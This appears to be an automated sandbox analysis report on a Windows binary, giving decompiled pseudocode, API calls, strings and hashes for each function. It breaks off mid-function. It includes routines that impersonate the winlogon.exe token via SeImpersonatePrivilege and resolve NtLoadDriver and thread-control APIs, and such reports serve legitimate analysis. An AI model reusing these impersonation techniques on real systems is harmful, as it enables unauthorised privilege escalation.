Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}

0x00401f04
0x00401f20
0x00401f27
0x00401f38
0x00401f3f
0x00401f4e
0x00401f54
0x00401f5f
0x00401f6e
0x00401f72
0x00401f77
0x00401f78
0x00401f91
0x00401f7a
0x00401f88
0x00401f8e
0x00401f8e
0x00401fa6
0x00401fa9
0x00401fae
0x00401fb0
0x00401fb2
0x00401fb9
0x00401fc2
0x00401fca
0x00401fd2
0x00401fd2
0x00401fd7
0x00401fd7
0x00401fe3

APIs

memset.MSVCRT ref: 00401F27
memset.MSVCRT ref: 00401F3F

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00401F5A
wcslen.MSVCRT ref: 00401F69
ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Strings

winlogon.exe, xrefs: 00401F54, 00401F59, 00401F80
SeImpersonatePrivilege, xrefs: 00401FB4

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
String ID: SeImpersonatePrivilege$winlogon.exe
API String ID: 3867304300-2177360481
Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC

Uniqueness

Uniqueness Score: -1.00%

Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27
libraryloadertimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}

0x0040955f
0x00409566
0x0040956e
0x00409576
0x00409586
0x00409586
0x0040956e
0x00409592
0x004095aa
0x00409594
0x004095a3
0x004095a6
0x004095a6

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3

Strings

GetProcessTimes, xrefs: 00409570
kernel32.dll, xrefs: 00409561

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t22;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				_t22 = E00402FC6(_t29, _t36,  &_v532); // executed
				return _t22;
			}

0x00402f3a
0x00402f51
0x00402f60
0x00402f6f
0x00402f78
0x00402f7a
0x00402f7a
0x00402f8a
0x00402f8f
0x00402f94
0x00402f99
0x00402f9e
0x00402f9f
0x00402fad
0x00402fb2
0x00402fb2
0x00402fbd
0x00402fc5

APIs

memset.MSVCRT ref: 00402F51

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 00402F6F
wcscat.MSVCRT ref: 00402F8A

Strings

.cfg, xrefs: 00402F84

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamememsetwcscatwcsrchr
String ID: .cfg
API String ID: 776488737-3410578098
Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20); // executed
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}

0x00409ddc
0x00409de4
0x00409df0
0x00409df5
0x00409df6
0x00409e03
0x00409e05
0x00409e06
0x00409e3b
0x00409e5d
0x00409e6a
0x00409e73
0x00409e75
0x00409e08
0x00409e08
0x00409e19
0x00409e37
0x00409e37
0x00409e81

APIs

memset.MSVCRT ref: 00409E08

Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
memset.MSVCRT ref: 00409E3B
GetPrivateProfileStringW.KERNEL32 ref: 00409E5D

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

0x00404951
0x00404952
0x00404956
0x004049a1
0x00404958
0x00404959
0x0040495b
0x0040495b
0x0040495f
0x00404961
0x00404963
0x0040496d
0x00404975
0x00404977
0x0040497b
0x00404985
0x0040498a
0x0040498e
0x00404993
0x0040499d
0x0040499d

APIs

malloc.MSVCRT ref: 0040496D
memcpy.MSVCRT ref: 00404985
free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

Strings

W@, xrefs: 0040495B

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: freemallocmemcpy
String ID: W@
API String ID: 3056473165-1729568415
Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}

0x0040543f
0x00405456
0x00405462
0x00405467
0x0040546d
0x00405478
0x00405489
0x0040548d
0x00000000
0x00405492
0x00405496

APIs

memset.MSVCRT ref: 00405456

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8

wcscat.MSVCRT ref: 00405478
LoadLibraryW.KERNELBASE(00000000), ref: 00405489
LoadLibraryW.KERNEL32(?), ref: 00405492

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
String ID:
API String ID: 3725422290-0
Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32 ref: 00409EA9

Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88

Uniqueness

Uniqueness Score: -1.00%

Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}

0x00408f4c
0x00408f57
0x00408f60
0x00408f62
0x00408f67
0x00408f67
0x00408f71

APIs

Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA

FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentErrorFreeLastLibraryProcess
String ID:
API String ID: 187924719-0
Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694

Uniqueness

Uniqueness Score: -1.00%

Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}

0x004098fa
0x004098fc
0x00409901
0x00409907
0x00000000
0x0040991c
0x00409918
0x00000000

APIs

Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FileModuleName
String ID:
API String ID: 3859505661-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208

Uniqueness

Uniqueness Score: -1.00%

Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}

0x004095da
0x004095da
0x004095de
0x004095e1
0x004095e7
0x004095e7
0x004095ee
0x004095fc

APIs

FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}

0x0040a3d0
0x0040a3d9

APIs

EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}

0x00408e38
0x00408e44
0x00408e56
0x00408e68
0x00408e7a
0x00408e8c
0x00408e9e
0x00408eb0
0x00408ec2
0x00408ed4
0x00408ee6
0x00408ef8
0x00408f0a
0x00408f1c
0x00408f21
0x00408f23
0x00000000
0x00408f28
0x00408f29

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

Strings

NtOpenSymbolicLinkObject, xrefs: 00408E81
NtTerminateThread, xrefs: 00408F11
NtSuspendThread, xrefs: 00408EED
NtLoadDriver, xrefs: 00408E5D
NtOpenThread, xrefs: 00408EB7
NtResumeThread, xrefs: 00408EFF
NtQueryInformationThread, xrefs: 00408EDB
NtQuerySystemInformation, xrefs: 00408E50
NtClose, xrefs: 00408EC9
ntdll.dll, xrefs: 00408E3F
NtQuerySymbolicLinkObject, xrefs: 00408E93
NtQueryObject, xrefs: 00408EA5
NtUnloadDriver, xrefs: 00408E6F

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
API String ID: 667068680-4280973841
Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
